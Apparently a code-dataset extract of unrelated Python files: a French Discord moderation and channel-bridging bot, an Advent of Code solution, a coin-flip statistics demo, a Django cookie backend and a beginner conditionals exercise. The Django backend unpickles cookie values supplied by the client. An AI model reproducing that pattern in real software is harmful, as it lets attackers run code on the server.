pickle\ncheminPickle = os.path.join(cheminOutputs, \"discordutils.p\")\n\ntry:\n INFOS = dict() if not os.path.exists(cheminPickle) else pickle.load(open(cheminPickle, \"rb\"))\nexcept:\n INFOS = dict()\n\nif True:\n BLANK = \"‎\" * 3\n\n if \"VOCAL_ROLE\" not in INFOS: INFOS[\"VOCAL_ROLE\"] = dict()\n VOCAL_ROLE = INFOS[\"VOCAL_ROLE\"]\n\n if \"AUTO_ROLE\" not in INFOS: INFOS[\"AUTO_ROLE\"] = dict()\n AUTO_ROLE = INFOS[\"VOCAL_ROLE\"]\n\n if \"BIND_NEW\" not in INFOS: INFOS[\"BIND_NEW\"] = dict()\n BIND_NEW = INFOS[\"BIND_NEW\"]\n\n if \"AUTO_ASSO\" not in INFOS: INFOS[\"AUTO_ASSO\"] = dict()\n AUTO_ASSO = INFOS[\"AUTO_ASSO\"]\n\n if \"AUTO_ROLE_CONF\" not in INFOS: INFOS[\"AUTO_ROLE_CONF\"] = dict()\n AUTO_ROLE_CONF = INFOS[\"AUTO_ROLE_CONF\"]\n\n if \"AUTO_PINS\" not in INFOS: INFOS[\"AUTO_PINS\"] = dict()\n AUTO_PINS = INFOS[\"AUTO_PINS\"]\n\n if \"CLOSE\" not in INFOS: INFOS[\"CLOSE\"] = set()\n CLOSE = INFOS[\"CLOSE\"]\n\n if \"MODO\" not in INFOS: INFOS[\"MODO\"] = dict()\n MODO = INFOS[\"MODO\"]\n\ndef save():\n pickle.dump(INFOS, open(cheminPickle, \"wb\"))\n\ndef estAdmin(usrId): return usrId in ADMINS\n\n\n#TRUCS UTILES ##################################################################\ndef resendFile(url, nomFichier):\n cheminSave = os.path.join(cheminOutputs, nomFichier)\n r = requests.get(url)\n with open(cheminSave, \"wb\") as f:\n f.write(r.content)\n\n return discord.File(cheminSave)\n\ndef supprFichier(fichierDiscord):\n chemin = os.path.join(cheminOutputs, fichierDiscord.filename)\n os.remove(chemin)\n################################################################################\n\nasync def dmChannelUser(user):\n if user.dm_channel is None:\n await user.create_dm() #crée le dm channel, et après user.dm_channel est remplacé par l'objet représentant le dm channel\n return user.dm_channel\n\nasync def bind_new_envoi(msg):\n if msg.content.startswith(BLANK) or msg.author.discriminator == \"0000\": return\n channelId = msg.channel.id\n guildId = msg.guild.id if msg.guild else msg.guild\n\n\n if channelId in BIND_NEW:\n if msg.content == \"\" and msg.embeds == [] and msg.attachments == []: return #c'est un message système qu'on ne veut pas transmettre\n\n groupe = BIND_NEW[BIND_NEW[channelId]]\n auteur, texte, files = msg.author, msg.content, lambda: [resendFile(x.url, x.filename) for x in msg.attachments]\n embeds = msg.embeds\n reference = msg.reference\n pseudoAuteur = auteur.nick or auteur.name\n\n embed = None if embeds == [] or auteur.id != bot.user.id else embeds[0]\n affiNom = f\"{pseudoAuteur} ({msg.guild.name if msg.guild else 'DM'})\"\n texteRenvoye = BLANK + \"**@{} :**\\n{}\".format(affiNom, texte)\n\n for channelCibleId, serveurCibleId in groupe.autresSalons((channelId, guildId)):\n serveur = bot.get_guild(serveurCibleId)\n channel = serveur.get_channel(channelCibleId)\n fichiersHere = files()\n\n if reference:\n referenceId = reference.message_id\n pendantRefChannel = groupe.copieDansSalon(referenceId, (channelCibleId, serveurCibleId))\n objRef = discord.MessageReference(message_id = pendantRefChannel, channel_id = channelCibleId)\n\n retransmis = await channel.send(texteRenvoye, reference = objRef, files = fichiersHere, embed = embed)\n else:\n webhook = discord.utils.get((await channel.webhooks()), name=auteur.name)\n if webhook is None:\n webhook = await channel.create_webhook(name = auteur.name)\n\n retransmis = await webhook.send(texte, wait = True, files = fichiersHere, embed = embed, username = affiNom, avatar_url = auteur.avatar.url)\n #retransmis = 
await channel.send(texteRenvoye, files = fichiersHere, embed = embed)\n\n groupe.ajoutMsg(msg.id, retransmis.id, (channelId, guildId), (channelCibleId, serveurCibleId), pseudoAuteur)\n\n map(supprFichier, fichiersHere)\n sleep(0.4)\n\n if randint(0, 10) == 0: save()\n\nasync def bind_new_edit(msg):\n channelId = msg.channel.id\n guildId = msg.guild.id if msg.guild else msg.guild\n if msg.author.id == 689536409060900933 or msg.author.discriminator == \"0000\": return #on ne fait rien si le bot modifie son propre message\n\n if channelId in BIND_NEW:\n groupe = BIND_NEW[BIND_NEW[channelId]]\n texte, embeds = msg.content, msg.embeds\n pseudoAuteur = groupe.auteurMsg(msg.id)\n\n texteRenvoye = BLANK + \"**@{} ({}) :**\\n{}\".format(pseudoAuteur, msg.guild.name if msg.guild else \"DM\", texte)\n for channelCibleId, serveurCibleId in groupe.autresSalons((channelId, guildId)):\n serveur = bot.get_guild(serveurCibleId)\n channel = serveur.get_channel(channelCibleId)\n\n echoId = groupe.copieDansSalon(msg.id, (channelCibleId, serveurCibleId))\n echo = await channel.fetch_message(echoId)\n if echo.reference:\n await echo.edit(content = texteRenvoye)\n else:\n webhook = discord.utils.get((await channel.webhooks()), name = pseudoAuteur)\n if webhook is None:\n webhook = await channel.create_webhook(name = pseudoAuteur)\n\n await webhook.edit_message(echoId, content = texte)\n\nasync def bind_new_del(msg):\n channelId = msg.channel.id\n guildId = msg.guild.id if msg.guild else msg.guild\n\n if channelId in BIND_NEW:\n groupe = BIND_NEW[BIND_NEW[channelId]]\n\n for channelCibleId, serveurCibleId in groupe.autresSalons((channelId, guildId)):\n try:\n serveur = bot.get_guild(serveurCibleId)\n channel = serveur.get_channel(channelCibleId)\n\n echoId = groupe.copieDansSalon(msg.id, (channelCibleId, serveurCibleId))\n echo = await channel.fetch_message(echoId)\n await echo.delete()\n sleep(0.4)\n except:\n print(\"Mon développeur a triché !\")\n\nasync def bind_new_react_add(reaction, user, bot):\n msg = reaction.message\n channelId = msg.channel.id\n guildId = msg.guild.id\n\n if user.id == 689536409060900933: return #on ne retransmet pas les réactions déjà faites par le bot\n\n if channelId in BIND_NEW:\n groupe = BIND_NEW[BIND_NEW[channelId]]\n\n for channelCibleId, serveurCibleId in groupe.autresSalons((channelId, guildId)):\n serveur = bot.get_guild(serveurCibleId)\n channel = serveur.get_channel(channelCibleId)\n\n echoId = groupe.copieDansSalon(msg.id, (channelCibleId, serveurCibleId))\n echo = await channel.fetch_message(echoId)\n await echo.add_reaction(reaction.emoji)\n sleep(0.4)\n\nasync def bind_new_react_del(reaction, bot):\n pass\n\nasync def bind_new_pin_event(channel, last_pin):\n channelId = channel.id\n guildId = channel.guild.id\n\n if last_pin and channelId in BIND_NEW: #sinon, c'est qu'on a retiré un pin (et pour le moment on ne fait rien)\n lastPinMsg = (await channel.pins())[0]\n groupe = BIND_NEW[BIND_NEW[channelId]]\n\n for channelCibleId, serveurCibleId in groupe.autresSalons((channelId, guildId)):\n serveur = bot.get_guild(serveurCibleId)\n channel = serveur.get_channel(channelCibleId)\n\n echoId = groupe.copieDansSalon(lastPinMsg.id, (channelCibleId, serveurCibleId))\n echo = await channel.fetch_message(echoId)\n try:\n await echo.pin()\n except:\n print(\"Mon développeur a triché\")\n sleep(0.4)\n\nasync def vocalrole_voicestate(member, before, after):\n channelBefore = before.channel and before.channel.id\n #si before.channel est None, il reste None, sinon on prend directement 
l'id du channel\n channelAfter = after.channel and after.channel.id\n guild = member.guild\n\n if guild.id in VOCAL_ROLE:\n rolesGuild = VOCAL_ROLE[guild.id]\n\n if channelBefore in rolesGuild and (channelAfter not in rolesGuild or (channelAfter in rolesGuild and rolesGuild[channelBefore] != rolesGuild[channelAfter])):\n retraitRole = guild.get_role(rolesGuild[channelBefore])\n await member.remove_roles(retraitRole)\n\n if channelAfter in rolesGuild and (channelBefore not in rolesGuild or (channelBefore in rolesGuild and rolesGuild[channelBefore] != rolesGuild[channelAfter])):\n nouvRole = guild.get_role(rolesGuild[channelAfter])\n await member.add_roles(nouvRole)\n\nasync def autorole_react_add(messageId, member, guild, emoji, add = True):\n if (messageId, emoji) in AUTO_ROLE:\n roleId = AUTO_ROLE[messageId, emoji]\n role = guild.get_role(roleId)\n\n if add and role not in member.roles:\n await member.add_roles(role)\n elif not add and role in member.roles:\n await member.remove_roles(role)\n\nasync def autorole_react_del(messageId, member, guild, emoji):\n await autorole_react_add(messageId, member, guild, emoji, False)\n\nasync def autoroleconf_react_add(messageId, member, guild, emoji):\n print(messageId, emoji, (messageId, emoji) in AUTO_ROLE_CONF, len(AUTO_ROLE_CONF))\n if (messageId, emoji) in AUTO_ROLE_CONF:\n roleId, channelConfId, pingConfId, serveurAutoId, roleAutoId, toWhoId = AUTO_ROLE_CONF[messageId, emoji]\n role = guild.get_role(roleId)\n\n dm = await dmChannelUser(member)\n\n roleConfirme = toWhoId is not None\n if not roleConfirme:\n if role in member.roles: #si le membre a déjà le rôle, ça vaut comme une confirmation automatique\n roleConfirme = True\n elif serveurAutoId is not None:\n serveurAuto = bot.get_guild(serveurAutoId)\n roleAuto = serveurAuto.get_role(roleAutoId)\n\n try:\n memberAutreServeur = await serveurAuto.fetch_member(member.id)\n except: #le membre n'est pas dans l'autre serveur\n roleConfirme = False\n else:\n roleConfirme = roleAuto in memberAutreServeur.roles\n\n if roleConfirme:\n if toWhoId:\n member = await guild.fetch_member(toWhoId)\n dm = await dmChannelUser(member)\n\n await member.add_roles(role)\n await dm.send(f\"**__Serveur {guild.name}__**\\nC'est bon, ton rôle est confirmé !\")\n\n if toWhoId:\n del AUTO_ROLE_CONF[messageId, emoji]\n save()\n else:\n channelConf = guild.get_channel(channelConfId)\n\n msgConf = await channelConf.send(f\"<@&{pingConfId}> : {member.mention} prétend être du groupe {role.name}. 
C'est vrai ?\")\n await msgConf.add_reaction(\"👍\")\n\n AUTO_ROLE_CONF[msgConf.id, \"👍\"] = (roleId, channelConfId, pingConfId, serveurAutoId, roleAutoId, member.id)\n\n save()\n\n await dm.send(f\"**__Serveur {guild.name}__**\\nTu as dit être dans le groupe {role.name}, ce sera confirmé par les admins bientôt.\")\n\nasync def autoasso_react_add(messageId, member, guild, emoji):\n messagesVerifies = (813413525560361010, 813413830918406224) #questions entrée\n messageAcces = 820709722860027915\n roleMembreServeurAsso = 811670434315239424\n memberId = member.id\n\n if messageId in messagesVerifies: #on répond à une question du \"qcm\" d'entrée, on enregistre la question à laquelle le membre a répondu\n if memberId in AUTO_ASSO:\n AUTO_ASSO[memberId].add(messageId)\n else:\n AUTO_ASSO[memberId] = {messageId}\n\n save()\n\n elif messageId == messageAcces: #on demande l'accès en acceptant le règlement\n if memberId not in AUTO_ASSO or len(AUTO_ASSO[memberId]) != len(messagesVerifies): #le qcm n'a pas été répondu\n channel = await dmChannelUser(member)\n\n await channel.send(f\"**Arrivée sur le serveur de l'API des Passionnés d'Informatique**\\nMerci d'avoir rejoint le serveur ! Pour y avoir accès, svp mettez bien des réactions aux {len(messagesVerifies)} messages au-dessus de celui qui permet d'accepter le règlement, puis remettre la réaction pour accepter le règlement.\\nÀ bientôt !\")\n else: #le qcm a été répondu, on donne l'accès au reste du serveur\n role = guild.get_role(roleMembreServeurAsso)\n await member.add_roles(role)\n await channel.send(f\"**Arrivée sur le serveur de l'API des Passionnés d'Informatique**\\nMerci ! Vous avez maintenant accès au reste du serveur.\")\n\nasync def autopin_react_add(messageId, member, guild, emoji, channel):\n if emoji == \"📌\": #c'est un pin !\n if messageId not in AUTO_PINS:\n AUTO_PINS[messageId] = {member.id}\n else:\n AUTO_PINS[messageId].add(member.id)\n\n save()\n\n if len(AUTO_PINS[messageId]) == 5: #on a 5 personnes qui demandent un pin, on le fait\n msg = await channel.fetch_message(messageId)\n\n try:\n await msg.pin()\n except:\n await channel.send(\"Le bot n'a pas le droit d'épingler des messages ici\")\n\nasync def autopin_react_del(messageId, member, guild, emoji, channel):\n if emoji == \"📌\":\n if messageId in AUTO_PINS:\n AUTO_PINS[messageId].remove(member.id)\n\n save()\n\n if len(AUTO_PINS[messageId]) < 5:\n msg = await channel.fetch_message(messageId)\n\n try:\n await msg.unpin()\n except:\n pass\n\nasync def envoiAutoSuppr(msg, bot):\n if msg.guild and msg.guild.id in MODO and msg.author.id != bot.user.id:\n try:\n channel = await bot.fetch_channel(MODO[msg.guild.id])\n except: #on n'a pas bien récupéré le salon, donc en fait on a 1 id de user, pas de salon\n channel = await bot.fetch_user(MODO[msg.guild.id])\n\n embeds, files = msg.embeds, lambda: [resendFile(x.url, x.filename) for x in msg.attachments]\n embed = None if embeds == [] or msg.author.id != bot.user.id else embeds[0]\n fichierHere = files()\n await channel.send(f\"{str(msg.created_at)} - {str(msg.channel.name)} - {msg.author.nick or msg.author.name} : {msg.content}\", files = fichierHere, embed = embed)\n\nasync def close_envoi(msg):\n channelId = msg.channel.id\n if channelId in CLOSE:\n try:\n await msg.delete()\n except:\n pass\n\ndef main():\n bot = commands.Bot(command_prefix = prefixeBot, help_command = None, intents = discord.Intents.all())\n\n @bot.event #pour ne pas afficher les messages d'erreur de commande inexistante (typiquement si on utilise une 
commande du bot squadro qui est gérée par un autre script)\n async def on_command_error(ctx, error):\n if isinstance(error, commands.CommandNotFound):\n return\n raise error\n\n @bot.event\n async def on_message_edit(_, msg):\n await bind_new_edit(msg)\n\n @bot.event\n async def on_message_delete(msg):\n await bind_new_del(msg)\n await envoiAutoSuppr(msg, bot)\n\n @bot.event\n async def on_member_join(member):\n bans = []\n for guild in bot.guilds:\n try:\n bans += list(x.user.id for x in (await guild.bans()))\n except: pass\n\n try:\n if member.id in bans:\n await member.ban()\n except:\n pass\n\n async def traitementRawReact(payload):\n if payload.guild_id and payload.user_id != bot.user.id: #sinon, on est dans le cas d'une réaction en dm\n messageId = payload.message_id\n guild = bot.get_guild(payload.guild_id)\n user = await guild.fetch_member(payload.user_id)\n channel = bot.get_channel(payload.channel_id)\n\n partEmoji = payload.emoji\n emojiHash = partEmoji.id if partEmoji.is_custom_emoji() else partEmoji.name\n\n return locals()\n else:\n return None\n\n @bot.event\n async def on_raw_reaction_add(payload):\n traitement = await traitementRawReact(payload)\n if traitement:\n messageId = traitement[\"messageId\"]\n user = traitement[\"user\"]\n guild = traitement[\"guild\"]\n emojiHash = traitement[\"emojiHash\"]\n channel = traitement[\"channel\"]\n\n await autorole_react_add(messageId, user, guild, emojiHash)\n await autoasso_react_add(messageId, user, guild, emojiHash)\n await autoroleconf_react_add(messageId, user, guild, emojiHash)\n await autopin_react_add(messageId, user, guild, emojiHash, channel)\n\n @bot.event\n async def on_raw_reaction_remove(payload):\n traitement = await traitementRawReact(payload)\n if traitement:\n messageId = traitement[\"messageId\"]\n user = traitement[\"user\"]\n guild = traitement[\"guild\"]\n emojiHash = traitement[\"emojiHash\"]\n channel = traitement[\"channel\"]\n\n await autorole_react_del(messageId, user, guild, emojiHash)\n await autopin_react_del(messageId, user, guild, emojiHash, channel)\n\n @bot.event\n async def on_reaction_add(reaction, user):\n await bind_new_react_add(reaction, user, bot)\n @bot.event\n async def on_reaction_clear_emoji(reaction):\n await bind_new_react_del(reaction, bot)\n\n @bot.event\n async def on_voice_state_update(member, before, after):\n await vocalrole_voicestate(member, before, after)\n\n\n @bot.event\n async def on_message(msg):\n #liaison de salon\n await bind_new_envoi(msg)\n await bot.process_commands(msg)\n await close_envoi(msg)\n\n @bot.event\n async def on_guild_channel_pins_update(channel, last_pin):\n await bind_new_pin_event(channel, last_pin)\n\n #bind channels\n @bot.command(name = \"utils_bind\")\n async def bind(ctx, salonSource: discord.TextChannel, serveurCible: int, salonCible: int):\n if not estAdmin(ctx.author.id): return\n\n salonSource = salonSource.id\n serveurSource = ctx.guild.id\n\n if salonSource in BINDED_CHANNELS:\n cible = BINDED_CHANNELS[salonSource]\n else:\n cible = set()\n BINDED_CHANNELS[salonSource] = cible\n\n cible.add((serveurCible, salonCible))\n\n if salonCible in BINDED_CHANNELS:\n cible = BINDED_CHANNELS[salonCible]\n else:\n cible = set()\n BINDED_CHANNELS[salonCible] = cible\n\n cible.add((serveurSource, salonSource))\n\n await ctx.message.add_reaction(\"👌\")\n\n save()\n\n @bot.command(name = \"utils_unbind\")\n async def unbind(ctx, salonSource: discord.TextChannel):\n if not estAdmin(ctx.author.id): return\n\n salonSource = salonSource.id\n\n if salonSource 
in BINDED_CHANNELS:\n for (_, channel) in BINDED_CHANNELS[salonSource]:\n BINDED_CHANNELS[channel] = {(x, y) for x, y in BINDED_CHANNELS[channel] if y != salonSource}\n\n BINDED_CHANNELS[salonSource] = set()\n await ctx.message.add_reaction(\"👌\")\n else:\n await ctx.send(\"Ce salon n'était pas relié aux autres\")\n\n save()\n\n #bind new\n @bot.command(name = \"create_bind\")\n async def createBind(ctx):\n if ctx.author.guild_permissions.administrator or estAdmin(ctx.author.id):\n int_to_hex = lambda x: hex(x)[2:]\n idGroupe = int_to_hex(randint(1000000, 9999999))\n BIND_NEW[idGroupe] = Groupe()\n\n await ctx.send(f\"Id du groupe : {idGroupe}. Pour ajouter un nouveau salon, il faut lancer la commande `{prefixeBot}bind {idGroupe}`\")\n\n save()\n\n @bot.command(name = \"bind\")\n async def bindnew(ctx, nomGroupe: str):\n channelId = ctx.channel.id\n guildId = ctx.guild.id if ctx.guild else ctx.guild\n\n if ctx.author.guild_permissions.administrator or estAdmin(ctx.author.id):\n if nomGroupe in BIND_NEW and (channelId not in BIND_NEW or BIND_NEW[channelId] == nomGroupe):\n groupe = BIND_NEW[nomGroupe]\n if groupe.salonInGroupe((channelId, guildId)):\n await ctx.message.add_reaction(\"❔\")\n else:\n groupe.addChannel((channelId, guildId))\n BIND_NEW[channelId] = nomGroupe\n\n await ctx.message.add_reaction(\"👌\")\n save()\n elif nomGroupe in BIND_NEW and channelId in BIND_NEW and BIND_NEW[channelId] != nomGroupe:\n groupeOld = BIND_NEW[BIND_NEW[channelId]]\n groupeOld.remChannel((channelId, guildId))\n\n groupe = BIND_NEW[nomGroupe]\n groupe.addChannel((channelId, guildId))\n BIND_NEW[channelId] = nomGroupe\n\n await ctx.message.add_reaction(\"👌\")\n save()\n else:\n await ctx.message.add_reaction(\"❌\")\n\n @bot.command(name = \"del_bind\")\n async def delBind(ctx, nomGroupe: str):\n if ctx.author.guild_permissions.administrator or estAdmin(ctx.author.id):\n if nomGroupe in BIND_NEW:\n for node in BIND_NEW[nomGroupe].getNodes():\n channelId, guildId = node.getLabel()\n del BIND_NEW[channelId]\n\n del BIND_NEW[nomGroupe]\n await ctx.message.add_reaction(\"👌\")\n\n save()\n else:\n await ctx.message.add_reaction(\"❔\")\n\n #vocal role\n @bot.command(name = \"utils_vocalbind\")\n async def vocalbind(ctx, role: discord.Role, salonVocalId: int):\n if not estAdmin(ctx.author.id): return\n\n guildId = role.guild.id\n\n if guildId not in VOCAL_ROLE:\n VOCAL_ROLE[guildId] = dict()\n\n VOCAL_ROLE[guildId][salonVocalId] = role.id\n await ctx.message.add_reaction(\"👌\")\n\n save()\n\n @bot.command(name = \"utils_vocalunbind\")\n async def vocalunbind(ctx, role: discord.Role):\n if not estAdmin(ctx.author.id): return\n\n guildId = role.guild.id\n roleId = role.id\n\n if guildId in VOCAL_ROLE:\n if roleId in VOCAL_ROLE[guildId].values():\n for salon in (x for x, y in VOCAL_ROLE.items() if y == roleId):\n del VOCAL_ROLE[guildId][roleId]\n\n await ctx.message.add_reaction(\"👌\")\n\n save()\n return\n\n await ctx.send(\"Inutile\")\n\n #autorole\n @bot.command(name = \"utils_autorole\")\n async def autorole(ctx, role: discord.Role, message: discord.Message, emoji: Union[discord.Emoji, str]):\n if ctx.author.guild_permissions.manage_roles or ctx.author.guild_permissions.administrator or estAdmin(ctx.author.id):\n emojiHash = emoji.id if isinstance(emoji, discord.Emoji) else emoji\n messageId = message.id\n\n if (messageId, emojiHash) not in AUTO_ROLE:\n AUTO_ROLE[messageId, emojiHash] = role.id\n\n try:\n await message.add_reaction(emoji)\n except:\n pass\n await ctx.message.add_reaction(\"👌\")\n else:\n del 
AUTO_ROLE[messageId, emojiHash]\n await ctx.message.add_reaction(\"👌\")\n await ctx.message.add_reaction(\"❌\")\n\n try:\n await message.remove_reaction(emoji, bot.user)\n except:\n pass\n\n save()\n\n #autorole avec confirmation (sauf reconnaissance automatique)\n @bot.command(name = \"utils_autoroleconf\")\n async def autoroleconf(ctx, role: discord.Role, message: discord.Message, emoji: Union[discord.Emoji, str], channelConf: discord.TextChannel, pingConf: discord.Role, serveurAutoId: Optional[int], roleAutoId: Optional[int]):\n if estAdmin(ctx.author.id):\n emojiHash = emoji.id if isinstance(emoji, discord.Emoji) else emoji\n messageId = message.id\n\n AUTO_ROLE_CONF[messageId, emojiHash] = (role.id, channelConf.id, pingConf.id, serveurAutoId, roleAutoId, None)\n\n try:\n await message.add_reaction(emoji)\n await ctx.message.add_reaction(\"👌\")\n except:\n pass\n\n save()\n\n @bot.command(name = \"utils_autoroleconf_reset\")\n async def autoroleconfreset(ctx):\n if estAdmin(ctx.author.id):\n AUTO_ROLE_CONF.clear()\n await ctx.message.add_reaction(\"👌\")\n\n save()\n\n #fermeture ouverture d'un salon\n @bot.command(name = \"open\")\n async def open(ctx):\n if ctx.author.guild_permissions.administrator or ctx.author.guild_permissions.manage_messages:\n CLOSE.remove(ctx.channel.id)\n save()\n await ctx.message.add_reaction(\"👌\")\n\n @bot.command(name = \"close\")\n async def close(ctx):\n if ctx.author.guild_permissions.administrator or ctx.author.guild_permissions.manage_messages:\n CLOSE.add(ctx.channel.id)\n save()\n await ctx.message.add_reaction(\"👌\")\n\n @bot.command(name = \"avatar\")\n async def avatar(ctx, someone: Optional[discord.User]):\n if someone is None:\n someone = ctx.author\n\n ref = discord.MessageReference(channel_id = ctx.channel.id, message_id = ctx.message.id)\n embed = discord.Embed()\n embed.set_image(url=someone.avatar.url)\n await ctx.send(embed=embed, reference = ref)\n\n\n @bot.command(name=\"redirMsg\")\n async def toto(ctx, guildId: int):\n guild = bot.get_guild(guildId)\n if guild:\n member = await guild.fetch_member(ctx.author.id)\n\n if member.guild_permissions.administrator:\n if guildId not in MODO:\n MODO[guildId] = ctx.channel.id\n else:\n del MODO[guildId]\n await ctx.message.add_reaction(\"👌\")\n\n save()\n\n return bot, TOKEN\n\nif __name__ == \"__main__\":\n bot, token = main()\n\n bot.run(token)\n","repo_name":"fabnem12/squadro-bot","sub_path":"discordUtils/discordutils.py","file_name":"discordutils.py","file_ext":"py","file_size_in_byte":30062,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"16"} +{"seq_id":"31276111018","text":"def main():\n n = int(input())\n terms = []\n s = 0\n i = 1\n while s <= n:\n s += i\n terms.append(i)\n i += 1\n\n del terms[s - n - 1]\n print(len(terms))\n print(*terms)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"e1fe12/learn_python","sub_path":"p02/various_terms.py","file_name":"various_terms.py","file_ext":"py","file_size_in_byte":246,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"41667139670","text":"import math\n\ntop3elves = [0,0,0]\ntop3max = [0,0,0]\n\ncurrentSum = 0\ncurrentElf = 1\n\nwith open(\"day1-input.txt\", \"r\") as f:\n for line in f:\n\n if line.strip():\n currentSum += int(line)\n else:\n if currentSum > min(top3max) :\n top3elves[top3max.index(min(top3max))] = currentElf\n top3max[top3max.index(min(top3max))] = currentSum\n\n currentElf += 1\n currentSum = 0\n \n 
\n\nfinalAnswer=zip(top3elves,top3max)\n\nfor elf, cal in finalAnswer:\n print(f\"Elf {elf} has {cal} calories\")\n\nprint(f\"the total is {sum(top3max)}\")","repo_name":"MaryGz/adventCalendar2022","sub_path":"day1.2-solution.py","file_name":"day1.2-solution.py","file_ext":"py","file_size_in_byte":611,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"27217689095","text":"# import numpy\nimport numpy as np\n\n# set a random seed to replicate the results\nnp.random.seed(42)\n\n# import matplotlib to visualize the experiment\nimport matplotlib.pyplot as plt\n\n#When we repeat an experiment a large number of times, the average result will be very close to the expected result, i.e. in the long run, random events tend to average out at the expected value. \n#Example: Flipping a coin\n#If we flipped a coin just 10 times we would not be surprised to get 7 heads (even though the expected value is 5).\n#But if we flip it 10,000 times we are very unlikely to get 7,000 heads. The result will likely be within a few percent of 5,000.\n#Let's simulate this coin-flipping example with Python.\n\n\n# generate ten random numbers (0 or 1) with equal probabilities\ncoin_flips_10 = np.random.randint(0,2,10)\n\n# how many heads in 10 coin flips\ncount_heads = sum(coin_flips_10 == 1)\nprint(count_heads)\n\n# empty list used to store the results\nheads_ratio_nflips = []\n\n# generate integers from 5 to 10,000\nn_flips = np.arange(5,10000)\n\nfor flips in n_flips:\n # how many heads / flips\n heads_ratio = sum(np.random.randint(0,2,flips) == 1) / flips\n\n # append ratios\n heads_ratio_nflips.append(heads_ratio)\n \n # set plot size\nplt.figure(figsize=(10,8))\n\n# number of flips on the x axe and heads ratio on y axe\nplt.plot(n_flips, heads_ratio_nflips)\n\n# expected ratio\nplt.plot(n_flips, len(n_flips)*[0.5], 'r--')\n\n# plot settings\nplt.figure(figsize=(10,8))\nplt.xlabel('Flips')\nplt.ylabel('Heads ratio')\nplt.show()\n","repo_name":"RaghavanArun/lighthouse-python-fundamentals","sub_path":"prep_course_statistics-master/The Law of Large Numbers.py","file_name":"The Law of Large Numbers.py","file_ext":"py","file_size_in_byte":1529,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"22765037008","text":"try:\n import cPickle as pickle\nexcept ImportError:\n import pickle\n\nfrom .base import Backend\n\nfrom datetime import datetime, timedelta\n\nfrom backward import settings\n\n\nclass CookieBackend(Backend):\n def get_url_redirect(self, request):\n return request.COOKIES.get(settings.URL_REDIRECT_NAME, None)\n\n def save_url_redirect(self, request, response, url_redirect):\n self.set_cookie(request, response, url_redirect, cookie_name=settings.URL_REDIRECT_NAME)\n\n def get_next_action(self, request):\n if settings.NEXT_ACTION_NAME in request.COOKIES:\n return pickle.loads(request.COOKIES[settings.NEXT_ACTION_NAME])\n\n return {}\n\n def save_next_action(self, request, response, data):\n self.set_cookie(request,\n response,\n pickle.dumps(data, pickle.HIGHEST_PROTOCOL),\n cookie_name=settings.NEXT_ACTION_NAME)\n\n def delete_next_action(self, request, response):\n response.delete_cookie(settings.NEXT_ACTION_NAME, domain=self.get_cookie_domain(request))\n\n def set_cookie(self, request, response, value, cookie_name):\n max_age = settings.COOKIE_MAX_AGE\n\n expires = datetime.strftime(datetime.utcnow() + timedelta(seconds=max_age),\n \"%a, %d-%b-%Y %H:%M:%S GMT\")\n\n try:\n 
response.set_cookie(cookie_name,\n value,\n max_age=max_age,\n expires=expires,\n domain=self.get_cookie_domain(request),\n secure=settings.COOKIE_SECURE or None)\n except UnicodeEncodeError:\n return False\n\n return True\n\n def get_cookie_domain(self, request):\n cookie_domain = settings.COOKIE_DOMAIN\n\n if cookie_domain and cookie_domain.startswith('.'):\n host = '.'.join(request.get_host().split('.')[-2:])\n\n cookie_domain = cookie_domain % {\n 'host': host\n }\n\n return cookie_domain\n","repo_name":"thoas/django-backward","sub_path":"backward/backends/cookie.py","file_name":"cookie.py","file_ext":"py","file_size_in_byte":2093,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"16"} +{"seq_id":"42948940811","text":"#Author: Sam Allan\n#Date of Last Revision: 05/20/2023\n#Script: Seattle Ops 301n3 challenge 09\n#Purpose: Create if statements using these logical conditionals below. Each statement should print information to the screen depending on if the condition is met.\n#!Equals: a == b\n#!Not Equals: a != b\n#!Less than: a < b\n#!Less than or equal to: a <= b\n#!Greater than: a > b\n#!Greater than or equal to: a >= b\n#!Create an if statement using a logical conditional of your choice and include elif keyword that executes when other conditions are not met.\n#!Create an if statement that includes both elif and else to execute when both if and elif are not met.\n#Stretch Goals (Optional Objectives)\n#Pursue stretch goals if you are a more advanced user or have remaining lab time.\n#!Create an if statement with two conditions by using and between conditions.\n#!Create an if statement with two conditions by using or between conditions.\n#!Create a nested if statement.\n#Create an if statement that includes pass to avoid errors.\n\n#Variables:\n#sit, storing where the user is sitting as an argument when the function is called.\n#chairs, storing the number of chairs the user has sat in as an integer in a variable.\n\n# MAIN\n#defining function sit_finder to try to find where you are sitting. 
It can only verify whether or not the user is sitting in a chair.\ndef sit_finder(sit):\n#if the user is sitting in a chair\n if sit == \"chair\":\n #give them a helpful reminder.\n print(\"you're sitting in a chair!\")\n #return the value true to be used later.\n return True\n #else, if they're sitting in something that does not equal a chair\n elif sit != \"chair\":\n #despair\n print(\"where on earth are you sitting?!\")\n #return False value to be used later\n return False\n#defining chair_number function to find how many chairs the user has sat in\ndef chair_number(chairs):\n #if they try to say a word instead of a number\n if isinstance(chairs, str):\n #feign confusion\n print(\"I don't know what you're talking about\")\n #return a 0 integer to be used when the function is called later.\n return 0\n #else if they've sat in fewer than 3 chairs\n elif chairs <= 3:\n #chastise them\n print(\"somebody loves standing\")\n #if they've sat in fewer than 20 chairs\n elif chairs < 20:\n #scold them\n print(\"that's not that many chairs\")\n #if it's greater than 90 chairs\n elif chairs >= 90:\n #make fun of the user\n print(\"whoa, ok, slow down chairmaster\")\n #if it's greater than 50 chairs\n elif chairs > 50:\n #be impressed\n print(\"whoa, buddy, that's a lot of chairs\")\n #if it's fewer than or equal to 50, unless one of the above conditions has already been met\n elif chairs <= 50:\n #be unimpressed\n print(\"ok, pretty average amount of chairs\")\n #otherwise\n else:\n #forget the topic\n print(\"I forgot what we were talking about.\")\n #return the integer value given by any of these conditions that is set off to the variable \"chairs\"\n return chairs\n#calling the function within a variable, asking for user input in the argument.\nsit = sit_finder(input(\"where are you sitting?\"))\n#storing user input in a variable to be used as an argument when the num_chairs function is called\nuser_input = input(\"how many chairs have you sat in?\")\n#if the contents of the user_input variable is a string, attempt to convert it to an integer. 
